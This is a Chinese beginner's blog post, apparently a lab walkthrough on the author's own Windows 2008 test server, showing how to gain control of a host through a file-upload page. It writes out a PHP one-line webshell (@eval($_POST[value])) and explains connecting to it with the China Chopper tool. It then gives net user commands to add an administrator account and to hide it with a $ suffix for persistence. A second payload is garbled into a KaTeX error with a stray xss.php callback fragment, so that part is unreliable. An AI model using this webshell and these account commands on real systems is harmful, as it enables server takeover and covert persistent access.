如何通过靶机ip来获取目标主机数据

大家好，这是我的第一篇博客，如有问题的话请在下方留言！

如何通过靶机ip来获取目标数据库

靶机ip：192.168.*.*
先进行访问以下靶机ip看看是一个什么样的页面，正常情况下需要在打开页面后检查一下，一般在页面中会有遗留的信息在里面（仔细找一下），在这里我就用我之前所搭建的一个win2008（环境：php5.4+mysql+win2008r2）来做一下演示。

我现在将靶机ip写入到host文件中用www.a.com来代替

下图是一个简易的上传文件页面

再上传文件的时候我需要植入一个木马我推荐的有两种：php一句话木马 /php大马
php一句话木马：

php大马：
KaTeX parse error: Expected 'EOF', got '&' at position 141: …/xss.php?do=api&̲id=c7rL&locatio…password.’"/>’;

下面我们先将php一句话木马/php大马生成一个php文件如下图：

eval:
	eval() 函数把字符串按照 PHP 代码来计算。该字符串必须是合法的 PHP 代码，且必须以分号结尾。如果没有在代码字符串中调用 return 语句，则返回 NULL。如果代码中存在解析错误，则 eval() 函数返回 false。

@eval($_POST[value])通俗的将也就是将你所传入的文件给返回出相应的路径来；

将生成的a.php文件传入

点击上传后返回img/a.php，这个img指的是存储的路径；获取到这个存储路径后，那下面我们就需要借助一样东西“中国菜刀”
将菜刀下下来之后（会被电脑拦截删除，再恢复一下就行），点击运行菜刀


右键进行添加，将www.a.com/img/a.php放入到url，后面的地方传的value就是之前a.php中的value，点击添加；如下图

双击我们所添加的www.a.com/img/a.php会进入下面的页面

这个时候我们就可以去找我们想要的东西去了。
如果你想要远程能够登陆上去的话，就需要在上一张图上选中www.a.com/img/a.php进行右键点击虚拟终端，会呈现如下图

然后我们来查询一下有几个用户输入命令net user

然后我们在给自己添加一个用户，输入命令net user 用户名 密码 /add;再查询一下

发现就有了，然后我们在给这个用户添加一下权限，把他分配到administrator组（win默认最高）里面去(输入命令：net localgroup administrator min /add)，这样我们就能远程访问了


到了这一步，我想各位想要获取什么应该不是很难了吧，

如果你想创建隐藏账户的话只需要在创建用户的命令上加上一个$符号即可net user 用户名 $ 密码 /add;

如有讲述的不周到的地方，请各位多多指教！谢谢